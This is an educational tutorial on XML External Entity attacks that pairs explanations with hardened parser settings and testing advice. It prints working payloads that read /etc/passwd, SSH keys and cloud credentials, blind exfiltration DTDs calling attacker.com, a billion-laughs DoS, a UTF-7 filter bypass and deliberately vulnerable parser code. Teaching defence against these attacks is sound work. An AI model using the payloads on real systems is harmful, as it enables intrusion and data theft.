# XML External Entity (XXE) Attacks

CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION

XXE Attack Illustration

Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.

XXE attacks exploit how XML parsers handle external entities. When a server parses a specially crafted XML document with entity resolution enabled, the parser follows the references embedded in it, which can mean reading sensitive files or making network requests on the attacker's behalf.

Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.


# What is XXE? (In Simple Terms)

XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:

<person>
    <name>John</name>
    <age>30</age>
</person>

Entities in XML are like variables or shortcuts. You can define them like this:

<!ENTITY company "Acme Corp">
<message>Welcome to &company;</message>

When processed, &company; gets replaced with "Acme Corp".
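
To see that substitution happen, here is a minimal Python sketch using the standard library's `xml.etree.ElementTree`. The `DOCTYPE` wrapper is added here because an entity declaration has to live inside one; the element and entity names are taken from the example above.

```python
import xml.etree.ElementTree as ET

# The entity is declared in the document's internal DTD subset.
document = """<!DOCTYPE message [
  <!ENTITY company "Acme Corp">
]>
<message>Welcome to &company;</message>"""

root = ET.fromstring(document)
print(root.text)  # Welcome to Acme Corp
```

This is an internal entity: its value is written in the document itself, so nothing outside the document is read.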

External Entities can reference files or URLs:

<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>

# Real-World Analogies

You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.

You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.

Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.


# How XXE Works (The Step-by-Step Story)

Let's see how a typical XXE attack unfolds:

Scenario: Website with XML File Upload

<?xml version="1.0"?>
<!-- User uploads normal XML -->
<order>
    <item>Laptop</item>
    <quantity>1</quantity>
</order>

Server processes it normally and displays: "Order received: 1 Laptop"

<?xml version="1.0"?>
<!-- Hacker uploads this -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>

What the parser does:

  1. Parser sees <!ENTITY xxe SYSTEM "file:///etc/passwd">
  2. Parser defines entity "xxe" that references /etc/passwd
  3. Parser sees &xxe; in the XML
  4. Parser reads /etc/passwd file
  5. Parser replaces &xxe; with file contents

Server response:

Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

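The hacker just read the server's user account list! On modern systems /etc/passwd holds account names rather than password hashes, but the same trick works for any file the server process is allowed to read.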
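
The five parser steps can be mimicked with a toy model. This is only a sketch of the idea, not how a real XML parser is built: `naive_expand` and `FAKE_FILES` are made-up names, and the "filesystem" is an in-memory dictionary so nothing real is read.

```python
import re

# Stand-in for the server's filesystem so the sketch touches no real files.
FAKE_FILES = {"file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash"}

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")


def naive_expand(document: str) -> str:
    """Toy model of a parser that resolves external entities."""
    # Steps 1-2: collect each declared entity and the URI it points to.
    entities = dict(ENTITY_DECL.findall(document))
    # Keep only the part after the DOCTYPE block (the actual content).
    body = document.split("]>", 1)[-1]

    def resolve(match):
        uri = entities.get(match.group(1))
        # Steps 4-5: "read" the target and substitute its contents.
        # Unknown references are left untouched.
        return FAKE_FILES.get(uri, match.group(0))

    # Step 3: find every &name; reference in the content.
    return ENTITY_REF.sub(resolve, body)


upload = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>"""

print(naive_expand(upload))
```

The point of the model is that the application never asked for the file. The substitution happens inside the parser, before the application code sees the `<item>` value.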


# Types of XXE Attacks

# 1. Classic XXE (File Disclosure)

FILE ACCESS DATA THEFT

What it is: Reading files from the server's filesystem.

Attack Example:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>&file;</firstName>
</userInfo>

Files Hackers Target:

[Linux Systems]
<!ENTITY file SYSTEM "file:///etc/passwd">       <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow">       <!-- Password hashes (readable only if the parser runs as root) -->
<!ENTITY file SYSTEM "file:///etc/hosts">        <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->
[Windows Systems]
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">
[Application Files]
<!ENTITY file SYSTEM "file:///var/www/html/config.php">  <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json">         <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env">                     <!-- Environment config -->

Vulnerable Code:

[Python - Vulnerable]
from lxml import etree

xml_data = request.files['upload'].read()

# resolve_entities=True expands external entities
# (this was the default before lxml 5.0)
parser = etree.XMLParser(resolve_entities=True)
tree = etree.fromstring(xml_data, parser)

# Attacker can read any file the server can access
[Java - Vulnerable]
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
[PHP - Vulnerable]
// PHP - VULNERABLE
// LIBXML_NOENT turns entity substitution ON, including external entities.
// On PHP < 8.0, libxml_disable_entity_loader(false) also re-enables loading.
$xml = simplexml_load_string($xmlData, 'SimpleXMLElement', LIBXML_NOENT);  // DANGEROUS!

# 2. Blind XXE (No Direct Output)

STEALTHY OUT-OF-BAND

What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.

Attack Method - Out-of-Band Exfiltration:

Create file at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;

Then upload this XML to the target application:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<data>test</data>

What happens:

  1. Server parses your XML
  2. Server fetches evil.dtd from your server
  3. evil.dtd reads /etc/passwd
  4. evil.dtd makes HTTP request to attacker.com with file contents in URL
  5. You receive the data in your server logs:

    GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1

# 3. XXE to SSRF

NETWORK ACCESS INTERNAL SYSTEMS

What it is: Using XXE to make the server send requests to internal systems.

Attack (reaching an internal admin interface):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>

Attack (reaching the cloud metadata endpoint at 169.254.169.254):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>
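
On the defensive side, it helps to recognise which destinations count as "internal" when reviewing entity URLs in logs or writing egress rules. A minimal sketch using only the standard library follows; `is_internal_target` is a hypothetical helper name, and it deliberately does not resolve DNS names, which a real check would need to handle.

```python
import ipaddress
from urllib.parse import urlparse


def is_internal_target(url: str) -> bool:
    """Return True if the URL points at a loopback, private, or link-local host."""
    host = urlparse(url).hostname or ""
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name (or no host at all): this sketch does not resolve it.
        return False
    return address.is_loopback or address.is_private or address.is_link_local


print(is_internal_target("http://localhost:8080/admin"))
print(is_internal_target("http://169.254.169.254/latest/meta-data/iam/security-credentials/"))
print(is_internal_target("http://8.8.8.8/"))
```

Both payload targets above are classified as internal, while a public address is not.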

# 4. Billion Laughs (XXE DoS)

DENIAL OF SERVICE RESOURCE EXHAUSTION

What it is: Denial of Service through exponential entity expansion.

Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What Happens:

  • lol9 expands to 10 lol8's
  • Each lol8 expands to 10 lol7's
  • This continues...
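  • Final expansion: 10^8 (100 million) "lol" strings, about 300 MB of text from a payload under 1 KB (the classic version adds one more level to reach a billion)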
  • Server runs out of memory and crashes
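
The size of the expansion can be worked out directly. A short calculation for the payload shown above, which has eight nested definitions (lol2 through lol9) of ten references each:

```python
# Each level repeats the previous entity 10 times; "lol" is the base string.
base = "lol"
levels = 8    # lol2 .. lol9 are eight nested definitions
fanout = 10   # references per definition

copies = fanout ** levels
expanded_bytes = copies * len(base)

print(f"{copies:,} copies of {base!r}")                # 100,000,000 copies of 'lol'
print(f"about {expanded_bytes / 1e6:.0f} MB of text")  # about 300 MB of text
```

Every extra level multiplies the result by ten, which is why a few more lines in the payload are enough to exhaust memory.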

# 5. XXE in Different File Formats

HIDDEN XXE

XXE isn't just in .xml files. Many file formats use XML internally:

DOCX (Microsoft Word):

1. Create malicious XXE in word/document.xml
2. Zip it as .docx
3. Upload to document processor
4. XXE executes when the document is parsed

XLSX (Microsoft Excel):

1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX

SVG images:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500">
  <text x="0" y="16">&xxe;</text>
</svg>

SOAP requests (the DOCTYPE must come before the root element):

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserInfo>
      <userId>&xxe;</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>
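
Since legitimate office documents have no reason to carry a DTD, one defensive option is to inspect ZIP-based uploads before handing them to a document processor. The sketch below is one possible approach, not a complete scanner: `parts_with_doctype` is a hypothetical helper, it only looks at the first 64 KiB of each part, and it will miss parts encoded as UTF-16.

```python
import io
import zipfile


def parts_with_doctype(archive_bytes: bytes) -> list[str]:
    """List XML parts inside a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            # A DOCTYPE must precede the root element, so only the head is read.
            # Padding before the DOCTYPE could push it past this window.
            with archive.open(name) as part:
                head = part.read(64 * 1024)
            if b"<!DOCTYPE" in head:
                flagged.append(name)
    return flagged


# Build a tiny in-memory archive to show the check in action.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as demo:
    demo.writestr("word/document.xml", '<!DOCTYPE d [<!ENTITY e "x">]><d>&e;</d>')
    demo.writestr("word/styles.xml", "<styles/>")

print(parts_with_doctype(buffer.getvalue()))  # ['word/document.xml']
```

A check like this complements a hardened parser in the document processor. It does not replace one.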

# Real-World Attack Scenarios

# Scenario 1: Facebook XXE Vulnerability (2014)

$30K BOUNTY RESPONSIBLE DISCLOSURE

The Setup:

  • Facebook allowed uploading office documents
  • Documents were processed server-side for preview
  • DOCX files contain XML

The Attack:

  1. Researcher created a DOCX with an XXE payload
  2. The XXE payload read internal files

Could access:

  • Internal network configurations
  • Source code
  • Configuration files

Impact:

  • Reported through bug bounty
  • Facebook paid $30,000 reward
  • Vulnerability patched quickly

# Scenario 2: Google's XXE in XML Editor

CLIENT-SIDE XXE

The Attack:

  • Google Toolbar used XML for configuration
  • XML editor didn't disable external entities

Attack Payload:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>

Result:

  • Could read local files from user's computer
  • Patched after responsible disclosure

# Scenario 3: IRS E-Filing XXE (2018)

GOVERNMENT SYSTEM TAX DATA

The Setup:

  • IRS tax filing system accepted XML
  • Used for business tax returns
  • Inadequate XXE protection

Potential Attack:

<!-- Tax return XML -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
  <BusinessName>&xxe;</BusinessName>
</TaxReturn>

Impact:

  • Could have accessed sensitive tax data
  • Found by security researchers
  • Government patched before exploitation

# Scenario 4: WordPress Plugin XXE

MASS EXPLOITATION WORDPRESS

The Vulnerability:

  • Popular WordPress plugin processed XML feeds
  • RSS/Atom feed parser had XXE vulnerability

Attack:

<?xml version="1.0"?>
<!-- Malicious RSS feed -->
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
  <channel>
    <title>&xxe;</title>
  </channel>
</rss>

Result:

  • Exposed WordPress database credentials
  • Affected thousands of websites
  • Emergency patch released

# Advanced XXE Techniques

# 1. PHP Expect Wrapper (Remote Code Execution)

RCE

If PHP's expect module is loaded:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>

# 2. Parameter Entities for Blind XXE

ADVANCED

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %all;
]>
<foo>&send;</foo>

Contents of http://attacker.com/evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">

# 3. UTF-7 Encoding Bypass

FILTER EVASION

Some filters check for <!ENTITY but miss encoded versions:

<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4
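
A filter that matches ASCII text can be made less fragile by first checking which encoding the document declares and refusing anything unexpected. A minimal sketch follows; the allowlist contents and the helper names are assumptions for illustration, and the parser itself should still be hardened.

```python
import re

# Assumption: the service only ever needs these encodings.
ALLOWED_ENCODINGS = {"utf-8", "us-ascii"}
DECLARATION = re.compile(
    rb"^\s*<\?xml[^>]*?encoding\s*=\s*[\"']([A-Za-z][A-Za-z0-9._-]*)[\"']"
)
UTF16_BOMS = (b"\xff\xfe", b"\xfe\xff")


def declared_encoding(data: bytes):
    """Return the lower-cased encoding named in the XML declaration, or None."""
    match = DECLARATION.match(data[:200])
    return match.group(1).decode("ascii").lower() if match else None


def encoding_is_allowed(data: bytes) -> bool:
    """Accept only documents whose encoding an ASCII-based filter can read."""
    if data[:2] in UTF16_BOMS:
        return False  # UTF-16 text would also hide "<!ENTITY" from a byte filter
    encoding = declared_encoding(data)
    # No declaration means the XML default of UTF-8.
    return encoding is None or encoding in ALLOWED_ENCODINGS


print(encoding_is_allowed(b'<?xml version="1.0" encoding="UTF-7"?><a/>'))
print(encoding_is_allowed(b'<?xml version="1.0" encoding="UTF-8"?><a/>'))
```

The UTF-7 document is rejected and the UTF-8 one is accepted.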

# 4. XInclude Attacks

ALTERNATIVE METHOD

When you can't control DTD but can control XML content:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
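
Because XInclude needs no DTD, blocking `<!DOCTYPE` alone does not catch it. One way to spot it is to look for elements in the XInclude namespace after parsing. The sketch below uses the standard library's ElementTree, which treats `xi:include` as an ordinary element and does not act on it; `xinclude_targets` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def xinclude_targets(xml_text: str) -> list[str]:
    """Return the href of every xi:include element in the document."""
    root = ET.fromstring(xml_text)
    # Match on the namespace URI, so any prefix the sender chose is covered.
    return [el.get("href", "") for el in root.iter(f"{{{XINCLUDE_NS}}}include")]


sample = """<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>"""

print(xinclude_targets(sample))  # ['file:///etc/passwd']
```

A non-empty result is a reason to reject the document before it reaches any component that has XInclude processing switched on.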

# Prevention and Mitigation

# 1. Disable External Entities (Primary Defense)

PRIMARY DEFENSE

[Python (lxml) - Secure]
from lxml import etree

# SECURE: Disable external entities
parser = etree.XMLParser(
    resolve_entities=False,  # Don't resolve entities
    no_network=True,         # No network access
    load_dtd=False           # Don't load DTD
)

xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)
[Java - Secure]
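import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;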

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
[PHP - Secure]
<?php
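// SECURE: Disable external entity loading.
// libxml_disable_entity_loader() is deprecated since PHP 8.0, where
// external entity loading is already off by default.
if (\PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// Never pass LIBXML_NOENT (it enables entity substitution).
// LIBXML_NONET blocks network access while loading documents.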
$xml = simplexml_load_string(
    $xmlData,
    'SimpleXMLElement',
    LIBXML_NOCDATA | LIBXML_NONET
);
?>
[Node.js - Secure]
const libxmljs = require('libxmljs');

// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
    noent: false,    // Don't substitute entities
    nonet: true,     // No network access
    dtdload: false,  // Don't load DTD
    dtdvalid: false  // Don't validate against DTD
});
[.NET - Secure]
using System.Xml;

XmlReaderSettings settings = new XmlReaderSettings();

// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

using (XmlReader reader = XmlReader.Create(stream, settings))
{
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}

# 2. Use Simple Data Formats

RECOMMENDED

Avoid XML When Possible:

XML (needs a hardened parser):

<order>
  <item>Laptop</item>
  <quantity>1</quantity>
</order>

JSON (no entities or DTDs to abuse):

{
  "order": {
    "item": "Laptop",
    "quantity": 1
  }
}
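
Reading the JSON version of the order takes one standard-library call. A minimal sketch, with the payload taken from the example above:

```python
import json

payload = '{"order": {"item": "Laptop", "quantity": 1}}'
order = json.loads(payload)["order"]

# JSON has no entity or DTD mechanism, so parsing cannot trigger
# file reads or network requests the way an XML parser can.
print(order["item"], order["quantity"])  # Laptop 1
```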

# 3. Input Validation

DEFENSE IN DEPTH

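import re

def validate_xml(xml_input):
    """Reject XML that contains DTD or entity syntax (defense in depth only)."""

    # Uploaded data arrives as bytes; decode it before matching str patterns.
    # Input in another encoding (UTF-7, UTF-16) slips past this check,
    # so the parser itself must still be hardened.
    if isinstance(xml_input, bytes):
        xml_string = xml_input.decode('utf-8', errors='replace')
    else:
        xml_string = xml_input

    # SYSTEM and PUBLIC identifiers only appear inside DTD declarations,
    # which <!DOCTYPE and <!ENTITY already cover. Matching bare 'http://'
    # would reject every document that declares a namespace, so it is left out.
    dangerous_patterns = [
        r'<!ENTITY',
        r'<!DOCTYPE',
        r'file://',
        r'expect://',
        r'php://'
    ]

    for pattern in dangerous_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Suspicious XML content: {pattern}")

    return True

# Usage
xml_data = request.files['upload'].read()
validate_xml(xml_data)  # Raises ValueError if a pattern matches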
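
Text matching is easy to sidestep, so a stricter variation is to let a real parser report the DOCTYPE and abort on it. The sketch below uses the standard library's `xml.parsers.expat`; the names `DoctypeForbidden`, `reject_doctype`, and `is_acceptable` are made up for this example, and it assumes the application has no legitimate need for DTDs.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(data: bytes) -> None:
    """Parse the document and fail as soon as a DOCTYPE is encountered."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    # expat calls this handler when it reaches a DOCTYPE declaration.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # raises expat.ExpatError on malformed input


def is_acceptable(data: bytes) -> bool:
    """True for well-formed XML with no DOCTYPE, False otherwise."""
    try:
        reject_doctype(data)
    except (DoctypeForbidden, expat.ExpatError):
        return False
    return True


print(is_acceptable(b"<order><item>Laptop</item></order>"))
print(is_acceptable(b'<!DOCTYPE foo [<!ENTITY t "x">]><data>&t;</data>'))
```

Because the decision comes from the parser's own view of the document, encoding tricks that fool a text filter do not apply in the same way. Input that expat cannot decode is rejected as malformed.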

# 4. Use Modern XML Libraries

RECOMMENDED

Recommended Libraries:

defusedxml - Secure XML library specifically for preventing attacks

import defusedxml.ElementTree as ET

# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')

Use latest versions with secure defaults or consider using JSON instead

Node.js: fast-xml-parser with safe defaults. Better: use JSON

# 5. Least Privilege

INFRASTRUCTURE

[Create Limited User]
# Run the application with limited permissions.
# /etc/passwd is world-readable, but files such as /etc/shadow, SSH keys,
# and other users' data stay out of reach if the process lacks permission.

# Create limited user
useradd -r -s /bin/false xmlapp

# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'
[File Permissions]
# Secrets the XML-processing service does not need should not be readable by its user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml

# App runs as 'xmlapp' user
# Even if XXE exists, it can't read these config files

# Testing for XXE Vulnerabilities

# Manual Testing

TESTING GUIDE

Where to look for XML input:

  • File uploads (.xml, .docx, .xlsx, .svg)
  • API endpoints accepting XML
  • SOAP web services
  • RSS/Atom feed parsers
  • Configuration file uploads

Upload this XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY test "Hello XXE">
]>
<data>&test;</data>

If response contains "Hello XXE", entities are processed.

Next, test external entity resolution:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>

Check if hostname appears in response.

To test for blind XXE, set up a listener:

nc -lvp 9001

Upload XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>

If you receive a connection, the parser resolves external entities and blind XXE is possible.
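
The same kind of check can be run locally against your own parser configuration before it ever reaches production. The sketch below is one way to do that under stated assumptions: `resolves_external_entities` and `stdlib_parse` are hypothetical helper names, the canary is a throwaway temp file rather than a real system file, and the parser under test is passed in as a function that takes bytes and returns text.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

MARKER = "xxe-selftest-marker"


def resolves_external_entities(parse) -> bool:
    """Return True if `parse(bytes) -> str` leaks a local file via an external entity."""
    with tempfile.TemporaryDirectory() as tmp:
        canary = Path(tmp) / "canary.txt"
        canary.write_text(MARKER)
        document = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{canary.as_uri()}">]>\n'
            "<data>&xxe;</data>"
        ).encode()
        try:
            return MARKER in parse(document)
        except Exception:
            # A parser that refuses the document did not disclose the file.
            return False


def stdlib_parse(data: bytes) -> str:
    """Parser under test: the standard library's ElementTree."""
    return ET.tostring(ET.fromstring(data), encoding="unicode")


print(resolves_external_entities(stdlib_parse))
```

To test another library, wrap its parse call in a function with the same shape as `stdlib_parse` and pass that in. A `True` result means the configuration needs hardening.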

# Automated Tools

[XXEinjector]
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter

# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration
[Burp Suite]
1. Capture XML request
2. Send to Intruder
3. Insert XXE payloads
4. Analyze responses
[Custom Test Script]
import requests

url = "http://target.com/upload"

# Test payloads
payloads = [
    # Basic entity
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
    <data>&test;</data>''',

    # File disclosure
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
    <data>&xxe;</data>''',

    # Out-of-band
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
    <data>&xxe;</data>'''
]

for i, payload in enumerate(payloads):
    response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'})

    print(f"Payload {i+1}:")
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:200]}")
    print("-" * 50)

# Summary: What You Need to Remember

XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.

The Simple Version:

  • What it is: Tricking an XML parser into reading files or making requests by embedding malicious entity references
  • Why it's dangerous: Can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
  • How to prevent it: Disable external entity processing in XML parsers, use JSON instead of XML

Real-World Impact:

  • Facebook: Internal file disclosure (2014) - $30K bug bounty
  • IRS: Tax system vulnerability (2018)
  • WordPress: Mass exploitation through plugins

Common Targets: Configuration files, password files, SSH keys, source code

# Quick Protection Checklist

For Website Owners & Developers:

  • DO disable external entity processing in all XML parsers
  • DO disable DTD (Document Type Definition) processing
  • DO use simple data formats (JSON) instead of XML when possible
  • DO use secure XML libraries (defusedxml, latest versions)
  • DO run the application with least privilege
  • DO validate and sanitize XML input
  • DO keep XML processing libraries updated

  • DON'T allow external entity resolution in XML parsers
  • DON'T process untrusted XML with default parser settings
  • DON'T return raw XML parsing errors to users
  • DON'T trust office documents (.docx, .xlsx) - they contain XML
  • DON'T allow DTD declarations in user-supplied XML

For Regular Users:

  • TIP: Be cautious uploading XML files to untrusted sites - they could test for XXE
  • TIP: XXE mainly affects servers, not end users directly
  • TIP: If you manage systems, audit all XML-processing code



Last updated: November 2025